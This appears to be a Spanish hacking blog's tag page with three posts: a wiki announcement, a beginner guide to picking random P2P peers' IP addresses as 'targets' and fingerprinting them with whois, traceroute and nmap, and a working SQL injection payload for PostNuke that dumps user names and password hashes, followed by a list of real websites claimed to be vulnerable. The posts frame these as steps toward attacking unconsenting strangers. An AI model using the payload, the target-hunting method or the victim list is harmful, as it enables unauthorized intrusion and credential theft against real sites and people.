Posts Tagged ‘ Hacking ’

Nace intypedia project

intypedia project
Ha nacido intypedia project un wiki destinado a la seguridad informática donde más que texto se utilizarán videos para ejemplificar las cosas. Todas esas horas de no encontrar la opción que buscabais se han acabado. Espero que os sea de utilidad y sea un proyecto fructífero.
intypedia.com

Ha nacido intypedia project un wiki destinado a la seguridad informática donde más que texto se utilizarán videos para ejemplificar las cosas. Todas esas horas de no encontrar la opción que buscabais se han acabado. Espero que os sea de utilidad y sea un proyecto fructífero.
intypedia.com

Buscar máquinas objetivo! Primeros pasos!

Con este post dejamos atrás el paro de exámenes, y empezamos un nuevo paro, espero que más corto, el vacacional.

Buscar máquinas objetivo, no siempre tenemos una dirección IP a la que apuntar y ponernos a escanear, algunas veces por pura diversión/curiosidad, escaneamos máquinas desconocidas, en busca de información. En este post, aprenderemos como buscar máquinas objetivo, averiguar el proveedor de servicios a Internet que tiene, detectar el sistema operativo, puertos abiertos, y equipos por los que pasa un paquete desde nuestra máquina a la objetivo.

Para ello usaremos un sistema Linux, en mi caso Ubuntu 8.04 ( sí por fin la he instalado, y previa instalación de 320 MB de software de actualizaciones críticas estoy corriendo en ella).

El software manejado no instalado por defecto nos lo podemos bajar desde consola con:

sudo pat-get install traceroute

sudo apt-get install nmap

En primer lugar abrimos el aMule, y compartimos algo, o nos lo bajamos, consiguiendo que se establezcan conexiones a la escucha y establecidas con otros clientes P2P, y seguidamente, desde consola ejecutamos “ netstat -a” para ver las conexiones establecidas en nuestro equipo. Deberíamos obtener algo similar a esto:

Como vemos nos salen un montón de conexiones desde la mula, cogemos alguna al azar.  Mejor con el puerto del aMule abierto y la conexión establecida.

50,91,219,87

81,184,109,185

81,38,149,92

Recordad que algunas direcciones Ip, como las de telefónica no se leen seguidas, la primera cifra antes de la letra va de ultima, quedando 92,Red-81-38-149 como 81,38,149,92 , esto no es newbie, es de ser poco interesado en la materia y no leerse un manual de redes en la vida.

Bueno lo siguiente, es saber de que ISP es la IP, importante, por muchos motivos, por ejemplo si quieres la Ip de tu vecino que sabes que es ONO, y con eso te sale telefónica pues a seguir buscando, o alo mejor prefieres probar siempre con ip’s de Telefónica porque son unos estafadores y te caen mal.

Bien para saber de que ISP es nada más fácil que un whois en consola.Ejemplo:

Entre un montón de información irrelevante sobre ARIN, sale SIEMPRE el proveedor de servicios, es este caso AUNA.

Bueno ya sabemos algo de nuestra IP, lo siguiente va a ser ver si tiene router, modem, si está en una red y demás historias… algo tan fácil como hacer un tracert en LINUX.

Como vemos nos salen todas las direcciones por las que pasan los paquetes que enviamos a esa IP.

Por ejemplo 192.168.1.1 es la dirección local de mi router.

Y todas las siguiente mi ISP, centralitas enroutadores de telefónica y demás historias, hasta que divisemos su dirección IP y antes alguna dirección local que nos indique que estamos ante un router.

Para que vale esto, pues para empezar que saltarse un router da algo de más trabajo que un modem, porque para empezar el router opone resistencia, es un firewall, tiene sistema operativo propio, y si, también enrouta.

Para seguir con este super manual para super principiantes, vamos a sacar puertos abiertos, y sistema operativo con el escaner más famoso para Linux, nmap.

La sintaxis es la siguiente nmap -O IP fácil no?

Allá vamos:

En este caso la ip que he puesto de ejmplo de otra porque la de antes no devolvía nada, si, claro no es llegar y besar el santo, buscar un objetivo lleva tiempo,y cuando es al azar cuando no devuleve algo con nmap no te paras devolviendo cosas interesantes como en esta IP.

En este pantallazo podemos ver que los puertos abiertos son:

ftp

telnet

http

Y nos da algunas pistas sobre los posibles sistemas operativos que pueda tener el router al que nos enfrentamos.

Bueno hasta aquí este mini-tuto,esto e sla punta de un iceberg, es mucha más complejo buscar un buen objetivo, y una vez localizado sacar puntos débiles y explotarlos. En próximas entregas habaremos de como explotar una máquina con un DDOS y mediante software con exploits.

Nos vemos, y os pido disculpas por las faltas.

 

 

Ataque SQL Injection a PostNuke!

 Ha aparecido una vulnerabilidad de tipo SQL Injection en Postnuke.

 

Inyección de código:

 

index.php?module=PostSchedule&view=event&eid=-

 

 1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/

 

 from/**/nuke_users/**/where/**/pn_uid=2/*

 

 

El autor de dicho descubrimiento es Vuln search Kacper (kacper1964_at_yahoo.pl) de http://devilteam.pl

 

Algunas páginas encontradas por Freelogs.Net vulnerables al ataque son:

 

www.exactas.org

www.trabajosocial.unam.mx

www.amigosdelaire.com

www.dentistasrioja.com

www.adolince.net

www.sirzee.itcr.ac.cr

www.azimutclm.com

 

Entre las webs más interesantes destacar:

 

www.consuladouy-bcn.org ( Consulado de Uruguay en Barcelona)

www.lasalle.es ( Mi Ex colegio xD )

www.sinver.org ( Asociación universitaria de GAYS y LESBIANAS DE Barcelona)

www.sexosintabues.com ( Comunidad Erótica de España)

 

Freelogs.NET no ha perpetrado ningún ataque, son datos informativos, no nos hacemos responsables del  uso que se le pueda dar a esta información.